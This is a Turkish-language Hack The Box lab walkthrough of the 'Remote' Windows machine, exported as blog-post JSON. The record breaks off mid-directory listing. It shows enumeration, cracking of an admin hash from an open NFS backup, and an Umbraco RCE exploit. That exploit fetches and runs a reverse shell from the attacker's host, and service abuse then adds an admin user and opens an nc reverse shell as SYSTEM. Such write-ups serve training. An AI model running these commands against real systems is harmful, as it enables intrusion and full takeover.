{"id":1589,"date":"2021-10-07T01:12:20","date_gmt":"2021-10-07T01:12:20","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1589"},"modified":"2021-10-07T01:12:20","modified_gmt":"2021-10-07T01:12:20","slug":"remote","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/10\/07\/remote\/","title":{"rendered":"Remote"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/234\" title=\"Remote\">Remote<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/8d7c152dc9c28c9556b07dc724c6a37b.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131:<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]                                                                            \n\u2514\u2500# nmap 10.10.10.180 -p- -A -T4 -Pn                                                           \nHost discovery disabled (-Pn). All addresses will be marked &#039;up&#039; and scan times will be slower.      \nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-10-05 18:55 EDT\nStats: 0:01:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 71.43% done; ETC: 18:56 (0:00:07 remaining)\nNmap scan report for 10.10.10.180                                                                                                                                                             \nHost is up (0.074s latency).                                                                   \nNot shown: 65528 filtered ports\nPORT      STATE SERVICE       VERSION                                                          \n21\/tcp    open  ftp           Microsoft ftpd\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| ftp-syst:           \n|_  SYST: Windows_NT\n80\/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Home - Acme Widgets\n111\/tcp   open  rpcbind       2-4 (RPC #100000) \n| rpcinfo:         \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/tcp6  rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  2,3,4        111\/udp6  rpcbind\n|   100003  2,3         2049\/udp   nfs\n|   100003  2,3         2049\/udp6  nfs                                                                                                                                                        \n|   100003  2,3,4       2049\/tcp   nfs                                                         \n|   100003  2,3,4       2049\/tcp6  nfs\n|   100005  1,2,3       2049\/tcp   mountd\n|   100005  1,2,3       2049\/tcp   mountd                                                                                                                                               [0\/73]\n|   100005  1,2,3       2049\/tcp6  mountd\n|   100005  1,2,3       2049\/udp   mountd\n|   100005  1,2,3       2049\/udp6  mountd\n|   100021  1,2,3,4     2049\/tcp   nlockmgr\n|   100021  1,2,3,4     2049\/tcp6  nlockmgr\n|   100021  1,2,3,4     2049\/udp   nlockmgr\n|   100021  1,2,3,4     2049\/udp6  nlockmgr\n|   100024  1           2049\/tcp   status\n|   100024  1           2049\/tcp6  status\n|   100024  1           2049\/udp   status\n|_  100024  1           2049\/udp6  status\n135\/tcp   open  msrpc         Microsoft Windows RPC\n445\/tcp   open  microsoft-ds?\n2049\/tcp  open  mountd        1-3 (RPC #100005) \n49666\/tcp open  msrpc         Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: specialized|general purpose\nRunning (JUST GUESSING): AVtech embedded (87%), Microsoft Windows XP (85%)\nOS CPE: cpe:\/o:microsoft:windows_xp::sp3\nAggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%), Microsoft Windows XP SP3 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   2.02: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2021-10-05T22:57:36\n|_  start_date: N\/A\n\nTRACEROUTE (using port 445\/tcp)\nHOP RTT      ADDRESS\n1   74.57 ms 10.10.14.1\n2   75.16 ms 10.10.10.180\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 233.09 seconds\n<\/code><\/pre>\n<p>ftp'de bir \u015fey \u00e7\u0131kmad\u0131. 80'e bakt\u0131ktan sonra sadece buldu\u011fum \u015fey <strong>Umbraco CMS<\/strong> oldu\u011fu. Bu cms ile ilgili internette exploitler var ancak credential'a ihtiyac\u0131m\u0131z var. Bunun i\u00e7in incelemeler yapmaya devam ettim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.180]                                                               \n\u2514\u2500# gobuster dir --add-slash --expanded --follow-redirect --url http:\/\/10.10.10.180\/ --no-error -t 50 --wordlist \/usr\/share\/wordlists\/dirb\/big.txt --extensions aspx,html,txt | tee gobuster1\n===============================================================    \nGobuster v3.1.0                                                                                \nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)      \n===============================================================    \n[+] Url:                     http:\/\/10.10.10.180\/                  \n[+] Method:                  GET                                                               \n[+] Threads:                 50                                                                \n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt     \n[+] Negative Status codes:   404                                                               \n[+] User Agent:              gobuster\/3.1.0                                                    \n[+] Extensions:              aspx,html,txt                                                     \n[+] Add Slash:               true                                                              \n[+] Follow Redirect:         true                                                              \n[+] Expanded:                true                                                              \n[+] Timeout:                 10s                                                               \n===============================================================     \n2021\/10\/05 19:37:40 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.180\/1111\/                (Status: 200) [Size: 4196]\nhttp:\/\/10.10.10.180\/1111.aspx            (Status: 200) [Size: 4196]\nhttp:\/\/10.10.10.180\/Base\/                (Status: 400) [Size: 11]  \nhttp:\/\/10.10.10.180\/Blog.aspx            (Status: 200) [Size: 5001]\nhttp:\/\/10.10.10.180\/Contact\/             (Status: 200) [Size: 7880]\nhttp:\/\/10.10.10.180\/Blog\/                (Status: 200) [Size: 5001]\nhttp:\/\/10.10.10.180\/Contact.aspx         (Status: 200) [Size: 7880]\nhttp:\/\/10.10.10.180\/Home\/                (Status: 200) [Size: 6703]\nhttp:\/\/10.10.10.180\/Default.aspx         (Status: 200) [Size: 6693]\nhttp:\/\/10.10.10.180\/Home.aspx            (Status: 200) [Size: 6703]\nhttp:\/\/10.10.10.180\/People\/              (Status: 200) [Size: 6749]\nhttp:\/\/10.10.10.180\/Products\/            (Status: 200) [Size: 5338]\nhttp:\/\/10.10.10.180\/People.aspx          (Status: 200) [Size: 6749]\nhttp:\/\/10.10.10.180\/Products.aspx        (Status: 200) [Size: 5338]\nhttp:\/\/10.10.10.180\/about-us\/            (Status: 200) [Size: 5451]\nhttp:\/\/10.10.10.180\/about-us.aspx        (Status: 200) [Size: 5451]\nhttp:\/\/10.10.10.180\/base\/                (Status: 400) [Size: 11]  \nhttp:\/\/10.10.10.180\/blog\/                (Status: 200) [Size: 5011]\nhttp:\/\/10.10.10.180\/blog.aspx            (Status: 200) [Size: 5011]\nhttp:\/\/10.10.10.180\/contact.aspx         (Status: 200) [Size: 7890]\nhttp:\/\/10.10.10.180\/contact\/             (Status: 200) [Size: 7890]\nhttp:\/\/10.10.10.180\/default.aspx         (Status: 200) [Size: 6693]\nhttp:\/\/10.10.10.180\/home\/                (Status: 200) [Size: 6703]\nhttp:\/\/10.10.10.180\/home.aspx            (Status: 200) [Size: 6703]\nhttp:\/\/10.10.10.180\/install\/             (Status: 200) [Size: 4040]\nhttp:\/\/10.10.10.180\/intranet\/            (Status: 200) [Size: 3323]\nhttp:\/\/10.10.10.180\/intranet.aspx        (Status: 200) [Size: 3323]\nhttp:\/\/10.10.10.180\/master\/              (Status: 500) [Size: 3420]\nhttp:\/\/10.10.10.180\/master.aspx          (Status: 500) [Size: 3420]\nhttp:\/\/10.10.10.180\/people\/              (Status: 200) [Size: 6739]\nhttp:\/\/10.10.10.180\/people.aspx          (Status: 200) [Size: 6739]\nhttp:\/\/10.10.10.180\/person.aspx          (Status: 200) [Size: 2741]\nhttp:\/\/10.10.10.180\/person\/              (Status: 200) [Size: 2741]\nhttp:\/\/10.10.10.180\/product\/             (Status: 500) [Size: 3420]\nhttp:\/\/10.10.10.180\/product.aspx         (Status: 500) [Size: 3420]\nhttp:\/\/10.10.10.180\/products.aspx        (Status: 200) [Size: 5328]\nhttp:\/\/10.10.10.180\/products\/            (Status: 200) [Size: 5328]\nhttp:\/\/10.10.10.180\/umbraco\/             (Status: 200) [Size: 4040]\n\n===============================================================\n2021\/10\/05 19:54:46 Finished\n===============================================================\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]                                                                            \n\u2514\u2500# gobuster dir --add-slash --expanded --follow-redirect --url http:\/\/10.10.10.180\/umbraco\/ --no-error -t 50 --wordlist \/usr\/share\/wordlists\/dirb\/big.txt --extensions aspx,html,txt | tee 10\n.10.10.180\/gobuster2                                                                           \n===============================================================            \nGobuster v3.1.0                                                                                \nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)              \n===============================================================            \n[+] Url:                     http:\/\/10.10.10.180\/umbraco\/                  \n[+] Method:                  GET                                                               \n[+] Threads:                 50                                                                \n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt             \n[+] Negative Status codes:   404                                                               \n[+] User Agent:              gobuster\/3.1.0                                                    \n[+] Extensions:              aspx,html,txt                                                     \n[+] Add Slash:               true                                                              \n[+] Follow Redirect:         true                                                              \n[+] Expanded:                true                                                              \n[+] Timeout:                 10s                                                               \n===============================================================            \n2021\/10\/05 19:38:28 Starting gobuster in directory enumeration mode        \n===============================================================           \nhttp:\/\/10.10.10.180\/umbraco\/Default\/             (Status: 200) [Size: 4040]\nhttp:\/\/10.10.10.180\/umbraco\/Members\/             (Status: 403) [Size: 1233][[3~^[[3~^[[3~\nhttp:\/\/10.10.10.180\/umbraco\/Search\/              (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/actions\/             (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/application\/         (Status: 200) [Size: 2934]\nhttp:\/\/10.10.10.180\/umbraco\/assets\/              (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/config\/              (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/controls\/            (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/create.aspx          (Status: 200) [Size: 657] \nhttp:\/\/10.10.10.180\/umbraco\/create\/              (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/dashboard\/           (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/default\/             (Status: 200) [Size: 4040]\nhttp:\/\/10.10.10.180\/umbraco\/developer\/           (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/dialogs\/             (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/install\/             (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/js\/                  (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/lib\/                 (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/logout.aspx          (Status: 200) [Size: 657] \nhttp:\/\/10.10.10.180\/umbraco\/masterpages\/         (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/members\/             (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/ping.aspx            (Status: 200) [Size: 12]  \nhttp:\/\/10.10.10.180\/umbraco\/plugins\/             (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/preview\/             (Status: 200) [Size: 4040]\nhttp:\/\/10.10.10.180\/umbraco\/search\/              (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/settings\/            (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/translation\/         (Status: 200) [Size: 657] \nhttp:\/\/10.10.10.180\/umbraco\/tree.aspx            (Status: 200) [Size: 657] \nhttp:\/\/10.10.10.180\/umbraco\/views\/               (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/webservices\/         (Status: 403) [Size: 1233]\n\n===============================================================\n2021\/10\/05 19:55:16 Finished\n===============================================================\n<\/code><\/pre>\n<p>Daha sonras\u0131nda nfs'e bakt\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# showmount -e 10.10.10.180\nExport list for 10.10.10.180:\n\/site_backups (everyone)<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# mount -t nfs 10.10.10.180:\/site_backups \/mnt\/10.10.10.180                      \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# cd \/mnt\/10.10.10.180\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# ls\nApp_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config\n<\/code><\/pre>\n<p>Uzun bir s\u00fcre i\u00e7eride inceleme yapt\u0131m ancak \u00e7ok fazla dosya var bu y\u00fczden baz\u0131 elemeler yapmam\u0131z gerekmektedir. <\/p>\n<p><a href=\"https:\/\/our.umbraco.com\/forum\/umbraco-7\/using-umbraco-7\/74780-how-do-i-check-what-db-umbraco-is-using\">https:\/\/our.umbraco.com\/forum\/umbraco-7\/using-umbraco-7\/74780-how-do-i-check-what-db-umbraco-is-using<\/a> sayfas\u0131na bakt\u0131\u011f\u0131m\u0131zda database bilgilerinin config dosyalar\u0131nda <strong>umbracoDbDSN<\/strong> tagi ile sakland\u0131\u011f\u0131n\u0131 g\u00f6d\u00fcm. Bunun \u00fczerine bu anahtar kelimeye g\u00f6re arama yapt\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# grep -R &quot;umbracoDbDSN&quot; . | grep -v &#039;Lang&#039;\ngrep: .\/bin\/Umbraco.Core.dll: binary file matches\n.\/Web.config:           &lt;remove name=&quot;umbracoDbDSN&quot; \/&gt;\n.\/Web.config:           &lt;add name=&quot;umbracoDbDSN&quot; connectionString=&quot;Data Source=|DataDirectory|\\Umbraco.sdf;Flush Interval=1;&quot; providerName=&quot;System.Data.SqlServerCe.4.0&quot; \/&gt;\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# find . -name &#039;*Umbraco.sdf*&#039; -exec ls -al {} \\; 2&gt;\/dev\/null \n-rwx------ 1 nobody 4294967294 1965978 Feb 20  2020 .\/App_Data\/Umbraco.sdf<\/code><\/pre>\n<p>Dosya binary bir dosyayd\u0131.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# file .\/App_Data\/Umbraco.sdf                                 \n.\/App_Data\/Umbraco.sdf: data\n<\/code><\/pre>\n<p><a href=\"https:\/\/fileinfo.com\/extension\/sdf\">https:\/\/fileinfo.com\/extension\/sdf<\/a> adresine bakt\u0131\u011f\u0131m\u0131zda bunun bir db dosyas\u0131 oldu\u011funu anlad\u0131m ve string ile inceleme yapmaya ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# strings .\/App_Data\/Umbraco.sdf | nl | grep &#039;admin@htb.local&#039; | head\n     4  adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{&quot;hashAlgorithm&quot;:&quot;SHA1&quot;}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50\n     5  adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{&quot;hashAlgorithm&quot;:&quot;SHA1&quot;}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f\n  1109  User &quot;admin&quot; &lt;admin@htb.local&gt;192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/password\/changepassword change\n  1110  User &quot;admin&quot; &lt;admin@htb.local&gt;192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/sign-in\/logoutlogout success\n  1111  User &quot;SYSTEM&quot; 192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate\n  1112  User &quot;SYSTEM&quot; 192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/sign-in\/loginlogin success\n  1113  User &quot;admin&quot; &lt;admin@htb.local&gt;192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/sign-in\/logoutlogout success\n  1114  User &quot;SYSTEM&quot; 192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate\n  1115  User &quot;SYSTEM&quot; 192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/sign-in\/loginlogin success\n  1116  User &quot;admin&quot; &lt;admin@htb.local&gt;192.168.195.1User &quot;smith&quot; &lt;smith@htb.local&gt;umbraco\/user\/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity\n<\/code><\/pre>\n<p>Harika bir hash bulduk. Daha sonras\u0131nda bunu k\u0131rmay\u0131 denedim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# john \/root\/10.10.10.180\/hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt --format=Raw-SHA1\nUsing default input encoding: UTF-8\nLoaded 1 password hash (Raw-SHA1 [SHA1 128\/128 AVX 4x])\nWarning: no OpenMP support for this hash type, consider --fork=4\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nbaconandcheese   (admin@htb.local)\n1g 0:00:00:01 DONE (2021-10-06 18:21) 0.8547g\/s 8396Kp\/s 8396Kc\/s 8396KC\/s baconandchipies1..baconandcabbage\nUse the &quot;--show --format=Raw-SHA1&quot; options to display all of the cracked passwords reliably\nSession completed<\/code><\/pre>\n<p>Daha sonras\u0131nda buldu\u011fum exploitleri denmeye karar verdim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.180]                                                                                                                              \n\u2514\u2500# searchsploit Umbraco CMS                                                                                                                                  \n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                              |  Path                           \n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nUmbraco CMS - Remote Command Execution (Metasploit)                                                                         | windows\/webapps\/19671.rb        \nUmbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                                                  | aspx\/webapps\/46153.py           \nUmbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                  | aspx\/webapps\/49488.py           \nUmbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                                  | php\/webapps\/44988.txt           \n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results                                                                                                                                        \nPapers: No Results                                                                                                                                            \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.180]                                                                                                                              \n\u2514\u2500# searchsploit -m aspx\/webapps\/49488.py                                                                                                                     \n  Exploit: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                                         \n      URL: https:\/\/www.exploit-db.com\/exploits\/49488                                                                                                          \n     Path: \/usr\/share\/exploitdb\/exploits\/aspx\/webapps\/49488.py                                                                                                \nFile Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators                                                             \n\nCopied to: \/root\/10.10.10.180\/49488.py                                                                                                                        \n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.180]\n\u2514\u2500# python3 49488.py -u admin@htb.local -p baconandcheese -i http:\/\/10.10.10.180 -c hostname                                                              2 \u2a2f\nremote\n<\/code><\/pre>\n<p>Harika art\u0131k reverse alabiliriz.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# wget https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1\nWill not apply HSTS. The HSTS database must be a regular and non-world-writable file.\nERROR: could not open HSTS store at &#039;\/root\/.wget-hsts&#039;. HSTS will be disabled.\n--2021-10-06 19:14:00--  https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 4339 (4.2K) [text\/plain]\nSaving to: \u2018Invoke-PowerShellTcp.ps1\u2019\n\nInvoke-PowerShellTcp.ps1                100%[=============================================================================&gt;]   4.24K  --.-KB\/s    in 0s      \n\n2021-10-06 19:14:01 (25.2 MB\/s) - \u2018Invoke-PowerShellTcp.ps1\u2019 saved [4339\/4339]\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# nano Invoke-PowerShellTcp.ps1 \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# tail Invoke-PowerShellTcp.ps1 \n        }\n    }\n    catch\n    {\n        Write-Warning &quot;Something went wrong! Check if the server is reachable and you are using the correct port.&quot; \n        Write-Error $_\n    }\n}\n\nInvoke-PowerShellTcp -Reverse -IPAddress 10.10.14.21 -Port 443<\/code><\/pre>\n<p>Invoke-PowerShellTcp dosyas\u0131n\u0131 d\u00fczenledim ve reerse ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.180]\n\u2514\u2500# python3 49488.py -u admin@htb.local -p baconandcheese -i http:\/\/10.10.10.180 -c &#039;powershell.exe&#039; -a &quot;iex ((New-Object Net.WebClient).DownloadString(&#039;http:\/\/10.10.14.21\/Invoke-PowerShellTcp.ps1&#039;));&quot;\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nc -lvp 443\nlistening on [any] 443 ...\n10.10.10.180: inverse host lookup failed: Unknown host\nconnect to [10.10.14.21] from (UNKNOWN) [10.10.10.180] 49694\nWindows PowerShell running as user REMOTE$ on REMOTE\nCopyright (C) 2015 Microsoft Corporation. All rights reserved.\n\nPS C:\\windows\\system32\\inetsrv&gt;whoami\niis apppool\\defaultapppool\nPS C:\\windows\\system32\\inetsrv&gt; cd C:\/Users\nPS C:\\Users&gt; dir\n\n    Directory: C:\\Users\n\nMode                LastWriteTime         Length Name                                                                  \n----                -------------         ------ ----                                                                  \nd-----        2\/19\/2020   3:12 PM                .NET v2.0                                                             \nd-----        2\/19\/2020   3:12 PM                .NET v2.0 Classic                                                     \nd-----        2\/19\/2020   3:12 PM                .NET v4.5                                                             \nd-----        2\/19\/2020   3:12 PM                .NET v4.5 Classic                                                     \nd-----         7\/9\/2021   6:50 AM                Administrator                                                         \nd-----        2\/19\/2020   3:12 PM                Classic .NET AppPool                                                  \nd-r---        2\/20\/2020   2:42 AM                Public                                                                \n\nPS C:\\Users&gt; cd Public\nPS C:\\Users\\Public&gt; dir\n\n    Directory: C:\\Users\\Public\n\nMode                LastWriteTime         Length Name                                                                  \n----                -------------         ------ ----                                                                  \nd-r---        2\/19\/2020   3:03 PM                Documents                                                             \nd-r---        9\/15\/2018   3:19 AM                Downloads                                                             \nd-r---        9\/15\/2018   3:19 AM                Music                                                                 \nd-r---        9\/15\/2018   3:19 AM                Pictures                                                              \nd-r---        9\/15\/2018   3:19 AM                Videos                                                                \n-ar---        10\/6\/2021   5:53 PM             34 user.txt                                                              \n\nPS C:\\Users\\Public&gt; cat user.txt\nb44487ceb09f1a33d682e163f098182f<\/code><\/pre>\n<p>AMSI bypass i\u015flemi ger\u00e7ekle\u015ftirdim ve priv i\u00e7in scriptlerimi indirmeye ba\u015fadl\u0131m.<\/p>\n<pre><code class=\"language-sh\">\nPS C:\\Users\\Public&gt; iex ((New-Object Net.WebClient).DownloadString(&#039;http:\/\/10.10.14.21\/PowerUp.ps1&#039;));\nPS C:\\Users\\Public&gt; Invoke-AllChecks                    \n\nPrivilege   : SeImpersonatePrivilege\nAttributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\nTokenHandle : 2452\nProcessId   : 3040\nName        : 3040\nCheck       : Process Token Privileges\n\nServiceName   : UsoSvc\nPath          : C:\\Windows\\system32\\svchost.exe -k netsvcs -p\nStartName     : LocalSystem\nAbuseFunction : Invoke-ServiceAbuse -Name &#039;UsoSvc&#039;\nCanRestart    : True\nName          : UsoSvc\nCheck         : Modifiable Services\n\nUnattendPath : C:\\Windows\\Panther\\Unattend.xml\nName         : C:\\Windows\\Panther\\Unattend.xml\nCheck        : Unattended Install Files\n\nPS C:\\Users\\Public&gt; Get-ChildItem : Access to the path &#039;C:\\ProgramData\\USOPrivate&#039; is denied.\nAt line:4516 char:21\n+ ... $XMlFiles = Get-ChildItem -Path $AllUsers -Recurse -Include &#039;Groups.x ...\n+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : PermissionDenied: (C:\\ProgramData\\USOPrivate:String) [Get-ChildItem], UnauthorizedAccess \n   Exception\n    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand\n<\/code><\/pre>\n<p>\u0130\u015fimiz kolay ve zevkli g\u00f6z\u00fck\u00fcyor. Unquoted path attack ger\u00e7ekle\u015ftirece\u011fiz. Bir deneme yapal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\nPS C:\\Users\\Public&gt; Invoke-ServiceAbuse -Name &#039;UsoSvc&#039;                                                                                                        \n\nServiceAbused Command                                                                                                                                         \n------------- -------                                                                                                                                         \nUsoSvc        net user john Password123! \/add &amp;&amp; net localgroup Administrators john \/add  <\/code><\/pre>\n<pre><code class=\"language-sh\">\nPS C:\\Users\\Public&gt; net localgroup Administrators\nAlias name     Administrators\nComment        Administrators have complete and unrestricted access to the computer\/domain\n\nMembers\n\n-------------------------------------------------------------------------------\nAdministrator\njohn\nThe command completed successfully.<\/code><\/pre>\n<p>\u0130\u00e7eriye nc.exe at\u0131p reverse almay\u0131 denemek istiyorum. Bunun i\u00e7in pc'nin ka\u00e7 bit oldu\u011funu kontrol ettim.<\/p>\n<pre><code class=\"language-sh\">\nPS C:\\Users\\Public&gt; [System.Environment]::Is64BitOperatingSystem\nTrue\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\nPS C:\\Windows\\Temp&gt;                                                                                                                                           \nPS C:\\Windows\\Temp&gt; Invoke-WebRequest -Uri &quot;http:\/\/10.10.14.21\/nc64.exe&quot; -OutFile &quot;C:\\Windows\\Temp\\nc64.exe&quot; <\/code><\/pre>\n<pre><code class=\"language-sh\">\nPS C:\\Windows\\Temp&gt;  Invoke-ServiceAbuse -Name UsoSvc -Command &quot;C:\\Windows\\Temp\\nc64.exe 10.10.14.21 4444 -e cmd.exe&quot;<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt\/PowerSploit\/Privesc]\n\u2514\u2500# nc -lvp 4444                                                           1 \u2a2f\nlistening on [any] 4444 ...\n10.10.10.180: inverse host lookup failed: Unknown host\nconnect to [10.10.14.21] from (UNKNOWN) [10.10.10.180] 49692\nMicrosoft Windows [Version 10.0.17763.107]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32&gt;whoami\nwhoami\nnt authority\\system\n\nC:\\Windows\\system32&gt;cd C:\\Users\\Administrator\ncd C:\\Users\\Administrator\n\nC:\\Users\\Administrator&gt;ls\nls\n&#039;ls&#039; is not recognized as an internal or external command,\noperable program or batch file.\n\nC:\\Users\\Administrator&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is D582-9880\n\n Directory of C:\\Users\\Administrator\n\n07\/09\/2021  06:50 AM    &lt;DIR&gt;          .\n07\/09\/2021  06:50 AM    &lt;DIR&gt;          ..\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          3D Objects\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Contacts\n02\/20\/2020  03:41 AM    &lt;DIR&gt;          Desktop\n02\/19\/2020  05:26 PM    &lt;DIR&gt;          Documents\n02\/23\/2020  02:22 PM    &lt;DIR&gt;          Downloads\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Favorites\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Links\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Music\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          